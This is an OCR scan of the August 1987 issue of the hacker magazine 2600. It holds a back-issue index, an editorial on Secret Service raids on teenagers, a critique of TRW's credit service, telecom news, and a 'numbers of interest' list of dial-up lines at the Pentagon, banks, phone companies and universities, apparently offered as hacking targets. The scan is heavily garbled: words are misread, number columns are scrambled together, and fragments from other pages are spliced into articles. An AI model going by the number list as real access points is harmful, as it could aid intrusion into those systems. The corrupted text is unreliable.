You are on page 1of 24

DO YOU HAVE BACK ISSUES OF 26007 If not, look what you're missing!

1984
AHOYI
an Introduction to 2600. FBI GOES AFTER ADS HACKERS -FBI 'nvestlgator unWittingly reveals
tactics and recent activities
f-LASH LICA discusses GTE fdlds. AT&T credit cards, wireless phone trouble. THE TRUTH BEHIND
THOSE 9999 NUMBERS a toll free erro
story, DATA vanous White House extensions, HACKING ON TELENET- -how to's ol Telenet use,
E55 ORWELL'S PROPHECY-the first In a
series on the fun and dangers of ESS, FLASH directory assistance changes, computer alrban,
AT&T credit cards, etc . SOME THOUGHTS
C?N GARBAGE PICKING -first of a senes of trashing for valuable Information as related to
a diSCUSSion of crosstalk, DATA COUNTRY
CODES every last country code for overseas dialing, THE CONSTITUTION OF A HACKER - a
diSCUSSion of hacking ALTERNATE LONG
'
DISTANCE MCI-- history, systems, and serVices, FLASH 718, Connecticut Wiretaps, Sweden
person numbers, etc, THE FIRST ATOMIC
BOMB - an Inside story on the event as related to our nation's phone system, DATA ARPANET
HOSTS --list of acceSSible hosts, WHOSE
STRIKE WAS THAT ANYVVAY]- a startling analySIS of summer 83 phone strike, THE TROUBLE
WITH TELEMAIL -diSCUSSion of GTE's
Irresponsibility In protecting their system, FLASH AT&T credit cards, portable prisons,
414's plead, etc , A TRUE SAGA OF
ELECONFERENCING--what can happen on a teleconference, DATA MCI ACCESS NUMBERS-OIALUPS
FOR MCI MAIl. PHONE BOOK
COLLAGE #1---our artistiC heritage In phone book deSigns, THE SIMPLE PLEASURES OF A
STEP OFFICE diSCUSSion of Ins and Guts of
iJntlquated phone systems, IBM'S AUDIO DISTRIBUTION SYSTEM -using vOice messaging technology,
FLASH 414 sentencing, equal
access, bank record privacy, etc , THE WOES OF HAVING A SMALL-TIME RURAL PHONE COMPANY-a
true story, DATA AVAILABLE
NE'TWORKS ON THE DEFENSE DATA NETWORK a list Including base add,esses. EASYLINK
ACCESS NUMBERS. ARPANET HOPPING
AMERICA S NEWEST PASTIME how It works and tiPS for Its use, ELECTRONIC SWITCHING
ADVANCES -some of the poSSible services
and drawbacks, FLASH Directory assistance charges, 2600 writer Indicted, demIse of E-COM,
etc, THE DARK AND TRAGIC SIDE OF THE
GREAT BREAK-UP --a frank diSCUSSion, LETTERS sysop problem , 518 789 an XY step, etc
, DATA E-COM ACCESS NUMBERS-dial ups

tor the (now-de unct) serVice, NY TELEPHONE "LETTER OF DOOM ' --a copy of a law enforcement
monitoring notice, "LOOK OUT, HE'S GOT
,
ACOMPUTERI - a defense of the hacker ViewpOint MCI MAIL THE ADVENTURE CONTINUES
an analYSIS ofthewell-knovvn faulty E-mail
ystem, FLASH computerIZed meter-maid, blue box arrests, anti-hack legislation, INTRODUCING
THE CLEAR BOXt --"post-pay ' payphone
deVice, LETIERS new SWitching eqUipment, 99 scanning, repulSive operator story, etc , SPECIAL
REPORT TRW- BIG BUSINESS IS
WATCHING YOU
tlOW to use TRW, and an assessment of the potential of thiS system, BUT HOW DOES IT WORK]-a
Simple explanatIon of
le p! one system, wlrmg, voltages, black boxes, rmg, etc , PRIVACY LOST -a reView of DaVid
Burnham's book 'The Rise of the Computer
,
State , BE NICE TO YOUR TELCO-- how IndiViduals are abUSing their tekos. FLASH Big Brother
In Miami, NASA computer break-In,
computer export controls, 800 directOries, LETIERS hone scramblers, page numbers, hacker's
book, etc , DATA CNA NUMBERS list of
CNA's, A HACKER'S GUIDE TO AN AREA CODE a Simple scheme to ilelp "map out' exchanges
In your area, HISTORY OF BRITISH
PHREAKING an account of the history and techniques, MORE ON TRASHING what to look for, where
to go, how to act. A FRIEND IN HIGH
PLACES -story of a friendly operator, FLASH NSA insecurity, hacker caught. private directOries, LETIERS
phone loop, WAfS, TAP, etc ,
ATA A NON CO YRIGHTED DIRECTORY, NY TELEPHONE "BIG BROTHER' LETTERS -touch tone
Without permiSSion, etc, GETIING
CAUGHT HACKER S VIEW a story of the personal effects of hacking, VITAL INGREDIENTS --what
makes the phones work operators,
SWitching, FLASH NSA wants better phones, crime-computer Victim, wiretap loopholes, 911 attacker
caught. LETIERS BBS diSCUSSion,
Comsec Letter, Computer Crime Data, others, DATA NY TELEPHONE SECURITY NUMBERS, MCI
ANECDOTE-- ads, vulgaflsms, MCI
chairman profile, PHONE BOOK COLLAGE tt2, EXPLORING CAVES IN TRAVELNET - an Interesting
extender explained, FUN WITH
FO TRr-SS FONES - what a pay phone does, how people beat them, FLASH SS computer foul ups,
Alr10ne, Wiretaps, 818, pay phone attaCk,
LE. T rE S I:xx>k lISt, Silver boXing, another hacker s View, DATA IC S AND CARRIER IOENTIFICA nON
CODES --gUide to 950 exchange MCI
MAIL . TROUBLE LETIER" - the harassment begins, A TIME FOR REFLECTION the year In reView, MCI
MAIL AND EASYLINK -elect onlc
mail horror stones, THE SCARIEST NUMBER IN THE WORLD true story, FLASH campaign computer,
Pentagon by phone, students Ix>g
computer, electronlCoJad, federal phone upgrade, SURVEY -reader survey responses, SOME, BUT NOT
ALL ELECTRONIC MAIL SYSTEMS-
list and price comparisons plus vOice messaging companies, REACH OUT AND GOOSE SOMEONE-list
of many unique dial-It numbers

.'

t!

1985
THOSE HORRIBLE HACKERS STRIKE AGAIN analYSIS of Newsweek InCident, WlRE.TAPPING AND DIVESTITURE a lineman dtscusses
these tOpICS, GETIING IN THE BACK DOOR a gUide to some popular operating systems Including TOPS- 10, TOPS-20, and UNIX, 2600
INFORMA nON BUREAU our phone bill, our thanks, and other notices, FLASH IHS and telco data, GEISCO, KKK computer, LETIERS BBS
rights Ea.;;ylink. Canada loops, International phreak day, BITNET TOPOLOGY -a schematic of the BITnet, THE THEORY OF "BLUE
BOXING" history, future, and how they are used, TRASHING ALASKA STYLE--a real trashing adventure story, SURVEYING THE
COSMOS d beginners gUide to COSMOS, Bell's computer program, FLASH phreak roundups, real TRW crime, 26CX) BSS, 800 data,
LETTERS Bell problems, teko discount. marine calling, many Questions, 2600 INFORMATION BUREAUacronym list of useful telephone
Jargon, NAZI BBS A CHALLENGE TO HACKERS -- the role of the hacker, ARE YOU A PHREAK]ll humourous review of phreaklng, HOW TO
GET INTO A C 0
a tour of a central ofilce, FLASH custom calling, Kenyan pay phones, hacker coke machine, IRS computer screw up,
Lr-TTERS reading liSt, tracing and law enforcement, UNIX Info, NSA phone #, 2600 INFORMAnON BUREAU-Interesting phone numbers,
how to dial a telephone . New York Tel message, CNA LIST, NSACIPHER DISK, WHAT A WHITE BOX CAN DO-how to budd and the use of a
portdble touch tone generator, A PHONE PHREAK SCORES -another successful SOCial englneeflng story, HACKING PACKARD --useful
InformatIon about the HP2000, FLASH talking clock, computers for communists, robot kills man, war games, Silver pages, LEITERS Tom
lCllnpldls, secure telephones and cryptography, 26(X) INFORMATION BUREAU MILNET hosts by location, PEOPLE EXPRESS TO BE
HACKED TO PIECES a look at People s new anonymous reservation serVice, HOW IO RUN A SUCCESSFUL TELECONFERENCE - -complete
gUide to Alliance TeleconferenCing SerVice, FLASH hacker bust police hacker, Reagan doesn't dial kids, dlal-3-dlrectory, LEITERS
computer networks, silver boxes, 950, remob, tracing, 2600 INFORMATION BUREAU Alliance Teleconferenctng matenal, INTERESTING
PHONE' NUMBERS. UNBELIEVABLE ADVERTISEMENT. GUIDE TO THE ISRAELI PHONE SYSTEM. SHERWOOD FOREST SHUT DOWN BY
SECRET SERVICE, SOME WORDS ON HACKE:R MORALITY, OUT OF THE:: INNER CIRCLE REVIEWED -an e)(-hacker's new 0001<., FLASH who
Invented the phone, porno phone, Wiretap award, AT& T computer steals, LETTERS Information charges, AT& T cutoff, marine calling, 2600
INFORMATION BUREAU -800 prefixes by state. YSTEMATICALLY SPEAKING goodbye to meter readers, Thai p!lone books, tracking
deVices, TINA "Call Me" Card, FROM SHERWOOD FOREST INTRO TO HACKING what to do and not to do, INTERESTING THINGS TO 00
ON A DEC-20 -how to use variOus commands and some ttllngs to look for, BANKING FROM YOUR TE:RMINAL A LOOK AT PRONTO Flectronlc banking, how It works With a focus on Chemical s system, FLASH $2 bIllion error, In crackdovvn, monitoring, 2600

INFORMATlON BUREAU- Milnet TAC dialups by location, SYSTEMA nCAlL Y SPEAKING Mel poes optical. 1()()01o ESS, GTE bigger than
- an accurate account of the Private Sector BBS,
A T& T, SEIZED' 2600 BULLETIN BOARD IS IMPUCA rED IN RAID ON JERSEY HACKERSCOMMENTARY THE THREAT TO US ALL- what BBS seizures mean, FLASH 2600 a hacking Victim, Middlesex Courthouse, MOVING
SATELLlTE:S WHAT WAS REALLY GOING ON] - pOint by point correction of New Jersey prosecutors' fallaCIOUS charges, WHY
COMPUTERS GET SNATCHED- -why law enforcement seizes equipment, SOME IMPORTANT QUESTIONS TO ASK -provocatlvequestlons
about these events, HOW CAN SYSOPS PROTECT THEMSELVES, A GUIDE TO VMS- how to use DEC s VAX operating system, THE
INFINITY TRANSMITTER-an old bug explained, REACHING OUT ON YOUR OWN--blue boXing verification, PURSUIT FOR PEOPLE -GTE
Telenefs computer to computer link-up serVice, FLASH phone-In registration, 8CX) word numbers, war game addiCt. hacker extortiOnist,
2600 INFORMATION BUREAU -Telenet directory of Interesting addresses, SYSTEMATICALLY SPEAKING Dick Tracy toys, computer
directory aSSistance, Bell propaganda films, Europe tandardlzlng telcoms, MANY FAMILIAR TONES, AND THEY CALL US CROOKS] -story
of a phone phreak who can't sell tl lS expertise, AN INTERESTING DIVERSION---call dlverters and how they are abused, MORE INFO ON

VMS second mstallment of an In-depth gUide to VMS, FLASH---computer elections, big phone bill, Navy phreaks, phone booth captures
man, LETTERS BBS suygestlon, college are a goldllllne, recommended reading, 2600 INFORMATION BUREAU-Blue Box plans, THE NEW
AT& T HOSTAGE PHONE -unbelievable ad, SYSTEMATICALLY SPEAKING hackers scare bUSinesses, DuPont bypasses telco, computer
campaign mfo, phone computws, divestiture woes, RSTS A TRICK OR TWO --some aspects of thiS operating system, THE SECRET
REVEALED -the problem with GTE s GTDq5 SWitch, HISTORY Of. E::SS, EQUAL ACCESS MAY NOT BE "EQUAL" TO MODEMS -some
problems that may arise, FLASH columnist attacks AT& T, feds dial-It too much, little town phones, Springsteen mania, LETTERS some
adVice, Cles and free calls, Bntlsh phreak, blue boXing gone], CHASE BANK IS CRACKED, 2600 INFORMA nON BUREAU- -many interesting
test nUlllbers, SYSTEMATICALLY SPEAKING aVOid phones In storms, rural unequal access, police cellular phones, toll-free from where],
AT& T to read e mad, OUR WISHES FOR '86 AND BEYOND --some of what we d like to see In the future, FUN WITH COSMOS -how to
Interpret and USE' parts of the phone company computers, FLASH French phones, racist bdnter, Cltyphone, SURVEY - reader survey
responses, 2600 INFORMATION BUREAU BSS numbers, SYSTEMATICALLY SPEAKING AT&T e-mail, GenTian phones, super pay phone

Page

August. 1 987

(continued on inside back cover)


2600

The Summer Games of87


We've seen this so many times before.
Nationwide raids of computer
equipment at teenagers' houses.
Newspaper headlines about electronic
gangsters. Long periods of silence from
the investigators and the investigated.
First the facts: at least six homes
across the country were raided by the
Secret Service in mid-July. They were in
Rockville, Maryland; Burlingame,
California; Kentfield, California; two in
Brooklyn, New York; and one in
Bronxville, New York. (At the same
time, a number of houses in Pittsburgh

were being searched, supposedly for


simple credit card fraud and reportedly
unrelated to the action that we are
concerned with.)
What were these people allegedly up
to? Everyone seems to want a piece of
this one. Los Alamos NatiolUll
Laboratories, Stanford University,
TR W, US Sprint, AT&T, MCI, and
local phone companies are the ones
we 've heardfrom so far.
UnfortulUltely, when something like
this occurs and very little additiolUll
information is given out, imaginations

(continued on page 5)

STAFFBOX
Editor and Publisher
Eric Corley 110

Office Managers

Cover Art

Fran Westbrook

Tish Valter Koch

Peter Kang

Writers: John Drake, Paul Estev, Dan Foley, Mr. French,


Emmanuel Goldstein, Chester Holmes, The Kid & Company,
Lex Luthor, Bill from RNOC, David Ruderman, Bernie S., Mike
Salerno, Silent Switchman, Mike Yuhas, and the usual
anonymous bunch.

Production: Mike DeVoursney.


Cartoonists: Dan Holder, Mike Marshall.
Editor Emeritus: TSH.

1600 (ISSN 0749-3851) is published monthlr hr 2600

Enterprises. Inc. 7 Strong's Lane. Setauket.

NY J 1733.

Second class postage permit pending at Setauket. Ne .... York.


POSTMASTER: Send address changes to 2600.

Copyright"" 1997. 2(i.)()

p.o.

Box

752.

Middle Island.

NY I I 953'{)752.

Enterprises. Inc.

$15 individual. $40 corporate.


$55 corporate.
at $25 per year. $30 per year overseas.

Yearly suhscription: U.S. and Canada


Overseas

$25

individual.

Back issues availahle

ADDRESS ALL SlJBSCRIPTlON CORRESPONDENCE TO: 2600 Subscription Dept.. P.O. Box
Middle Island.

NY I I 953'{)752.

For lellers and article suhmissions. write to: 2600 Editorial Dept.. P.O. Box 99.
Ielcphone: (516) 751-2600

Middle Island.

1600

752.

NY 11953'{)752.

August, 1 987

Page 3

TRW Credentials' Lack Credibility


by Rex Valve

One of the powers commonly attributed to the


modem American hacker is absolute control over
the credit ratings of those who oppose them. Like

without needing to pay the fee.

all myths, this one too has a factual basis, which


is probably the well-publicized invasions of the

1984
2600. Hacker visitations to TRW

TRW credit service, documented in the


editions of

received widespread media coverage when

Newsweek columnist Richard Sandza found his

credit card numbers and similar private


information posted on a hackers' bulletin board.
Subsequent investigation revealed that due to
TRW's shoddy security practices, hackers had
the ability to make inquiries into TRW's vast
database of American consumers' credit
histories.

Well, this is America, and there's nothing

Now TRW is offering to those same American


consumers the ability to look at their own credit

wrong with companies trying to sell you

reports, and to see who makes inquiries. Their


new service, called TRW Credentials, lets a

make it look I ike you're buying more than the Fair

credit user look at his or her credit report, receive


a notification whenever anyone else gets a copy
of it (such as a bank where an application for a
credit card or loan is pending) and the ability to
add information that may improve one's credit
rating. Anyone with or without a credit history
can subscribe, as long as they're willing to fork

over $35 a year.


However, a closer look at their service reveals
that they are only selling a more convenient (and
expensive) version of what they must already
provide to you under the law. The Fair Credit
Reporting Act requires that companies who
compile credit histories make their information
available to the individuals in question, if they

requst it. For an $8 fee (the minimal charge


permitted under the act), they will send you your
credit file. The file will include a list of all
institutions who have received copies of it during
the past year. If you find something in your file
that is incorrect, you can protest to TRW, who
will then investigate by asking the institution
who provided the contested datum to verify its
accuracy

This applies to any credit history

service, not just TRW. Another feature of the Act


is that if you are denied credit, such as being
refused for a loan or credit card, you can (within
10 days) request a copy of your credit file
Page ",

August,

1 987

2600

something that you should already have. To


Credit Reporting Act, TRW adds on a "Financial
Profile" form, which supposedly lets you add
information to your credit file that may improve
. your chances at getting credit. But there's
nothing you can put on this form that can't be put
on an ordinary loan application, and the
subscribing credit grantors (such as banks or
department stores that also subscribe to TRW
Credentials) that might look at this information
receive it on a separate form. It turns out that all
TRW is saving you is the trouble of filling out a
credit application all the way. On top of this they
throw in insurance against unauthorized use of
your cards (which the law already protects you
against, beyond the first

$50), and the ability to

send your credit report to credit grantors


elsewhere in your state, should you want to shop
around for a loan (but only if you live in California
or New York, and only with credit grantors who
already subscribe to TRW Credentials). All in all,
a dubious value.

The Summer Games of 1987


tend to roam wild. Given the overall
technological illiteracy of the media and
law enforcement coupled with the
almost hysterical paranoia of the phone
phreaks and computer hackers, it soon
becomes abundantly clear that nobody
knows what the hell is going on.
That 's what 's most disturbing here.
ft 's one thing to break into people's
homes and go on a confiscating binge if
you 've got something to say when others
ask why. To do otherwise is not too far
from arresting someone and holding
them without naming a specific crime.
Having most of your possessions taken
away from you is unsettling enough
without having to wait to find out why.
We also have many questions
concerning the methods used. A
teenager was almost shot by the Secret
Service when he reachedfor a shirt after
having been woken up in his room.
Naturally, they assumed he was reaching
for a gun-that 's what hardened
criminals are supposed to do, after all. A
member of A T& T security found this
out-from the Secret Service themselves.
Apparently they thought it wasfunny.
The Secret Service knocked down at
least two front doors with battering
rams in their haste to get into these
homes. In each case that we heard oj,
there was substantial damage, much
more than what was necessary to get in.
That according to neighbors
and
.
eyewitnesses.
And in at least one other instance, the
Secret Service disguised themselves as
United Parcel Service employees. They
had a truck, packages, even the standard
UPS clipboard.
We 've had other reports of agents who
refused to identify themselves, didn't
produce search warrants, or acted in a
rude fashion.
What in the world is going on here?
Are these atrocities to be tolerated? Is
the Secret Service attempting to live up
to their initials or are they just incredibly

(continuedfrompage3

unaware of what they 're really doing?


These were all teenagers who were
involved in the raids. And while they
may have been quite intelligent, they
most certainly were not about to shoot
at police or pose any kind of a threat.
There was no need to "trick " them into
opening the door. That kind of gimmick
is appropriate for mobsters perhaps, but
not for adolescents.
We object to the methods used by the
Secret Service. In fact, we question the
very use of the Secret Service
themselves. Why was a group such as
this called in to deal with a matter that
virtually any law enforcement entity
could have handled?
Regardless of what comes out of this
case (if one is ever even presented), the
events that transpired are quite
inexcusable. Unfortunately, most of
those involved have been scared into
silence. Scared by the strongarm tactics
of the law, scared by the sensationalist
media, scared by not knowing what the
hell is going on. This is a very scary
situation.
If such an occurrence should happen
to you or anyone you know, this is what
we suggest: Keep an eye on everything
that is going on. Remember what is
taken, what is handled, what is said.
Write it all down when they leave. Do
not, under any circumstance, give them
an excuse to play rough. Law
enforcement types can take lives and
they can often get away with it. You
don 't have to answer any questions
without a lawyer present. Get the names
of everyone who comes into your
house-you are most certainly entitled
to know this. And if you do decide to
talk to the media, avoid the
sensationalist types like The New York
Post. Go for the newspapers that put a
little time into their stories and have
been known to uncover things in the
past. Make sure they understand what

(continued on page 14)


1600

August,

1987

Page 5

numbers of Interest
201 221 3778 AT&T

213 m 4 040 CAL TECH


213 581 4645
213 62 2706 LYOLA COLLEGE
2 13 643 26'30 E SEGUNDO AfB

201 480 1368 DCS

201 544 2062 fuRT


20: 54 4 2072 fORT
201 544 2781 rORT
20! S4 2,!3 flJT
21 54 4 2'!15 fORT
201 514 2946 fORT

MANOTH

MAi.:lOTH
:1AN!'!TH
r.A!!GTH
r.ANHOTH

213 687 4562 CALTECH

201 724 6731 DOVER

214 742 1637 SOUTHWESTERN BELL

201 885 1 242 AT T

214 742 2636 N T R CHA

214 954 5 85B JOSKES

201 8S5 51!1 ATT

215 253 7203

201 BB5 9540 AnT


202 227 3526 BE THESDA

215 284 3310 GENERAL ELECTRIC,

202 334 6831 WASHINGTON POST


202 347 3222 rAA

215 6 6 4 713B

202 553 0229 PENTAGON


202 633 7653 DEPT Or TRE AS URY

202 653 1079 NAVY

202 694 0004 PENTAGON

202 m 5261 CASPAR WE I NBERGER

215 349 3761

202 72B 01 2 4 US SPRINT

207 876 3317


826 6272
944 4523 STOCnON SCHOOL
242 0039 NYC G EN SER
315 4078

2123695114 SPENCE

QUEENS COLLEGE
NYC BOARD Of ED
COLLEGE

312 567 64BO ITT

m 557 6484 iTT


312 m 6 890 ITT
312 557 &993 ITT

312 5 67 68 36 ITT
312 592 6230 CONfERENCE B R ID GE
312 sn 6231 CONfERENCE BRIDGE
312 671 3013 PBX

219 m 7723

312 673 9081

217 424 3 4 5 0 SCHOOL DISTRICT 1 61

312 671 7605 PBX,

219 m 6067

303 232 8555 HP 3000


303 284 5130

303 371 1296


303 447 2540
303 m 7111
303 632 2144
303 753 2733

JC PENN EY S
com

PUPEAU or STANDARDS

LIBRARY
DENVEr UNIVERSITY
303 753 2737 DEN VE R UNIVERSITY

303 778
303 97B
304 376
304 927
305 587
305 851

212 769 1986 BUDDY SYSTE M

212 769 1 9 87 BUDDY SYSTEM

212 76 9 198B BUDDY SYS T E "

212 777 7600 COLLEGE


212 777 7890 NYU

212 m 'BB7 ISRAEL/HOLLAND TONES 305


212 922 9983 VENEZlS.AfRICA TONES 309
212 947 7522
312
213 204 4670 TDD
3!1
213 370 0787
312
213 379 0909 TOO
312
2 13 39'3 7 0 7 3 fAX
312
213 l; 8334 TWA
312
1 987

312 567 6479 ITT

312 671 3014 PBX

33 770 3553

RAPID DATA

August.

312 567 647B ITT

216 996 3392 ANERITRUST

301 728 5005


301 863 4815 PATUXENT R I VER
301 863 4816 PATUXET RIV ER

208 852 3072

312 30 1755 CDS"OS

312 567 5700 ITT

312 640 5750 DIGITAL C OH PUTERS

216 741 9312

301 &66 4700

205 m 3 5 7 6 GUNTER AfB


205 m 0926

I)age

312 m e5 !-!!eH Sr:H!!!!L

312 686 0697 O 'HA RE AIRPORT


301 27B 331 6 ABERDEN PRDVI.NG G N D S 312 7B2 1448 ILLINOIS BELL

202 697 0814 PENTAGON

212 520 7719


: 12 596 0587
212 598 7001
21 736 3 3 77

215 2% 9523

215 563 9213 HP 3000

202 m 6 7 00 DIAL TONE

212 502 5m

312 m 3094 l:aRTHWESTERN

214 742 1354 SOUTHIIESTERN BELL

201 724 6733 DOVER

:(,3
203
212
212

214 235 B729

214 331 4043

201 7 2 4 6734 DOVER

312 432 IB17 HIGHLAND tATlONAl

312 432 9401 (05"05

214 263 3103 NAIl BBS

201 724 6732 DOVE R

312 39B BI7I SCHOOL DISTRICT 1214

312 417 9994 TIIA

13 777 6747

213 798 200 rrs (FEDERAL TEU

HANMOrH

312 333 591B rmlLAB

312 399 81 7 0 ILLINOIS SCHOO

2600

Bill WANG VSI BO

2 4 8 8 SEATTLE SAVINGS
1773 NAIl 8BS
314B

1911
5534
9789
1m
0782

312 B52 2899 IB"


312 864 0566 GOOGOLPLEX
312 879 6B44 'EARS'

312 m 4601 mor


312 937 1210 ABBOTT LABS
312 9 3B 0600 mONALDS

31 2 939 938B D E PAUL


312 960 8600 COSMOS

312 972 7603 ARROGON


312 996 5100 UNIY. Of ILLINOIS
313 234 56 2 1 fTS (fEDERAL TEL)

313 262 6011 TR AVELN E T QUESTIONS

8860

5127 AnT
851 7406 AT&T
344 m6 NASA

222
250
253
25"
286
392

312 B52 0506 HHJSDALE SA VINGS


312 852 1305 HEATH

CHICAGO TRIFUNE

:H
NA1I PBS

(HICASO EDUCATION
ILLI NO iS BELL

7000 TIESHARING

313 377 4300 OAKLAND SCHOOL


313 556 1 300 TRAVELNET CUST SERV

313 556 4 7 05 TRAVEL NET INfO TA PE

313 562 1906 PBX

313 644 3B40 HIGH SCHOOL

313 644 3960 TSS

313 m BB21 ANN ARBOR SCHOOL

313 839 3373 mHIGAN BELL


313 B57 9500 OAKLAND SCHOOL

313 857 35% 18"

313 881 0 6 59 MICHIGAN BELL

313 Bn 0060 mHIGAN BELL

313 924 9377 mHIG;'N BELL

by nynex phreak
313 961 8572 mH[GAN BELL

516 567 B013 L1RICS

313 962 7071 BONDNET

516 632 81)00 SUNY 1I0DEI1 POOL

716 4&7 3242


,
717 872 0311 IIILLERSVILLE UNIVAC

516 751 2600 2600 "AGAZINE

71B 376 9775 COSIIOS

313 964 0042 mH[GAN BELL

313 9 64 20 I B CHARGE CARD ASSOC

313 964 4042 mHI6AN BELL


313 964 5908 "[CH[6AN NAT PARK
313 964 5858 BANK or DET RO I T
314 232 5990 "CDONNELL DOUGLASS
314 291 4510 rORD

314
314
31 4
315

532 3545 ROOSEVELT rEDERAL


503 2886
569 6910
423 1313 SYRACUSE UN[V

510 220 6503 RP[


602 %5 2001 AR[ZONA STATE
603 643 6310 DARTIIDUTH

800 223 2838

612 322 2431 fREEDC" NET

BOO 225 B456 A UfOm

6!2 332 1737 CTL nATA TLX

BOO 22B 0003

603 615 0533 PBX

612 333 Ise7 WESTERN UNID1


612 376 7730 SOFTWARE

319 386 8851 HP 2000

617 25B 6251 "IT

404 424 763

404 855 3460 SEARS

617 259 6511 MIT

617 2B 6623 MIT


617 259 7 1 1 5 lilT

617 258 7542 m

404 8 7 3 8555 CONFERENCE BRIDGE

617 258 8260 "IT

404 873 8682 AT.T

617 258 B313 "IT UNIVERSITY

404 8S5 3460 SEARS

617 339 5 071 USDS BOSTON

405 789 2323 BANK OF BETHANY

617 459 0159 LOWELL

408 280 190 I TRW

617 471 '3103 NORTHEAST UNIV

m 846 6209

617 732 1251 HARVARD UNIVERSITY

412 527 B291 FBI

412 m 7601 SLIPPERY RO CK UN[V


414 271 7827 AGRIDA

414 332 36G7


414 445 4050 DEC VAX
414 476 8010 DEC
415 3 2 7 5220 ARPANET
415 361 2500 I'IENLO PARK
415 442 211 AnT

800 2 23 3312 CITIBANK

BOO 2 2B 0019

612 339 5200 :tHERNAT I OIIAL GRAPH 800 228 1111 CREDIT CHECK
616 628 4699

402 978 7040 RSTS

BOO 2 22 0555 BANK OF AI1ERICA

609 452 6736 PRINCETON UNIV

319 386 8850 HP 2000

4 04 3 9 6 06 31

718 m 3560

71B 963 317 3 lIeI GAil)

617 732 IB02 HARVARD UN[VERSITY


617 B61 5591 HANSCDII BASE
619 225 1641 NATIONAL DEFENSE
619 225 6946 SAN DIEGO

m 2 26 7B84 SAN DIEGO


619 293 4510 UCSD
619 296 5010 COLDWELL BANKER
619 326 2174
619 m 6792 UCSD

800 245 6216

BOO 32 3 0094

BOO 323 0 i22

800 3 2 3 0170

800 323 0664

aoo 323 0679


800
800
9 00
80 0

325 4112 EASYLINK

325 6397
325 7222 Hel
327 6245

800 327 7725


BOO 327 949B ITT TONE

800 327 %38 EASYNET


800 32B 0404
800 336 01H TYII NET

800 336 0 437 TELENET


800 368 2711

BOO 368 3313 THE SOURCE


800 368 9407
BOO 368 940B

BOO 36B 9409


BOO 36B 9410

415 486 4959 DEVELCON


415 m 4294

619 723 8996 NAZI BBS


702 329 3559

BOO 421 2626

415 786 0120

702 737 B770

BOO 424 9494 TELENET

415 626 4458 NAlI NEI/SLI NE


415 786 0662

701 477 6442 ROLLA COLLEGE

703 274 5300 NATIONAL DEFENSE

800 36B 9426


BOO 392 5149

800 426 2500


BOO 426 5101

415 786 1533


415 829 6088

703 328 80B6 V[RGINIA UNIVERSITY

415 857 BI93 HP 3000

703 790 1740 FAA

415 863 9059

704 253 0106

800 52 7 1800 BANK BY PHONE

419 325 2191

704 253 6370


713 4B3 2700 NASUA

800 633 1 6 38 IIDBILE IIARINE RADIO

5Q2 45 4 5824 GENERAL ELECTRIC


5 03 645 9654

703 7BI 45 2 0 IIERADCOII

713 792 7200 EDUCATION

503 9 63 84 54

713 795 1200 SHELL VULCAN

504 522 5633 BANK OF LOU! S I AHA

713 8SB 6499 PBX

505 623 9 280

505 843 916 6


509 535 1363
512 4H SO II AUSTI N COI'IPUTERS
5 15 2 9 4 9440 [SO

713 941 7 619 NAZI 8BS

714 595 6467

714 8S7 5 55 2 NAZI NEWSlINE


714 962 3365 HATS
715 2 32 368B RSTS

800 522 5m LABLINK


9 00 526 3714 RCA GEORGIA

8'

BOO 633 009 0 IIESSAGE R ELAY


BOO 637 0958
BOO S21 5 662

800 862 2345 PBX

BOO 882 2255 PBX


BOO 932 6245

B04 B65 4051 NASA


B05 m 0940 TRW
August,

BOO 642 1 982 EDUCATION BDS

2600

19Si

Page

the telecom informer

BY GOLDSTEIN

II is not well in the home

for rapid detection of toll fraud . The

shopping i ndustry . Yes , those

system uses a network of ACD's

rid iculous shop-at-home

programs that have been popping up o n

U niversal

Billing Converters and

I nterface Adaptor U nits to monitor

nearly every television station in the

remote sites using the UBX Network

country ( i nclud i ng some P BS stations!)

Call Datal Billing Data Management

are havi ng maj o r prob lems with their

System . ... Pacific Bell is in trouble.

phones. Ta ke H ome Shopping

Someone called the Suicide Prevention

Network -the first and biggest of them

Center in Burlingame, California

all. They say more than half of their

threatening suicide. A cente r

incomi n g ca lls went unanswered last

represe ntative asked Pac Bell t o trace the

year! So they replaced their old Ce ntrex

numbe r a nd Pac BeIl cheerfully gave the

equipment with a Rockwell

wrong address. A woma n who happe ned

International Corporation Galaxy ACD

to live at the wrong address said rifle

switching system. AT&T provides the

carrying police officers a nd a large black

switching equipment, so the local central

attack dog came charging through her

office is comp letely bypassed. Will it

apartment. (Suicide is illegal, you

screw up? Stay tuned....The Federal

know.) She's suing Pac Bel l for alleged

Communications Commission has

i nvasion of privacy as we ll as p hysical

decided that it's not necessary for

and emotional damages. In all the fun,

cellular phones to be equipped with

no one seems to know what happened to

labels wa rn ing that conversations on

the original caller.... Did you know that

them can be easily intercepted by anyone

the most p restigious exchanges in the

with the proper radio. After all, it's now

H amptons are 324 (East H ampton) and

illegal to listen! Brilliant, just

283 (Southampton). The nouveau-riche

brilliant. ... Perception Technology

must settle for 329 (East Hampton) and

Corporation is selling equipment to

287 (Southampton). New York

dozens of college campuses that allow

Telephone reps say they've been offered

students to register for courses using

bribes for numbers with the old

touch tone phones. The two latest are

exchanges. Some status-conscious

the University of Alaska and Contra

people have been using answering

Costa Community College of Martinez,

services inside the old exchanges to

California. The equipment is called

avoid being embarrassed. More practical

VO-COM, a descrambling box that links

types are furious over the fact that call

phone lines to the university mainframe

waiting and equal access aren't available

computer using a voice response system.

(every one of the exchanges is

Other campuses using similar systems

crossbar)....Cockroaches, fire ants, and

are Lane Community College of Eugene,

wasps are the most common insects

Oregon; Brigham Young University of

found in phone equipment and they can

Provo, Utah; Louisiana State University

cause extensive damage, according to

at Baton Rouge; the University of

South Central Bell officials. "Spiders

Alberta; and the University of Southern

spinning webs across terminals cause

California at Los Angeles....MCl

moisture to collect on a terminal,

hackers, beware! MCI has recently

leading to shorting out or glitches in

bought the Real Time Toll Fraud

your telephone connection," an official

Detection System from Applied

said. "Termites can actually bore

Computing Devices Inc. of Terre Haute,

through cable lines." We've decided not

Indiana. The system uses on-site


selection and compression of call data

to print any phone bugging jokes here,

Page

August, 1987

2600

sorry .... Of the

$64.2

million collected by

(cont inued on page 2 J)

FBI revealed
The FBI Project Newslettlr
The FBI and Your BBS
Published by Glan L, Robarts

The

Box 8275-NI
Ann Arbor, MI 48017

FBI Project Newsletter

.....':-.:: =i::-=.:.-..:
. :

e.=:E!1
_'":::".:: ... -......""".....

Review by EmmanuII Goldsllin

.._ .._-.,.....--..-

5=':.':!-.

.=-":!:::........ --....

..

"t::;:.,----
.
.. ,.. -- .. _......
. -:=.==":::.---

...... ""_ ...

Two very important and relevant publications


came our way recently, both published by the
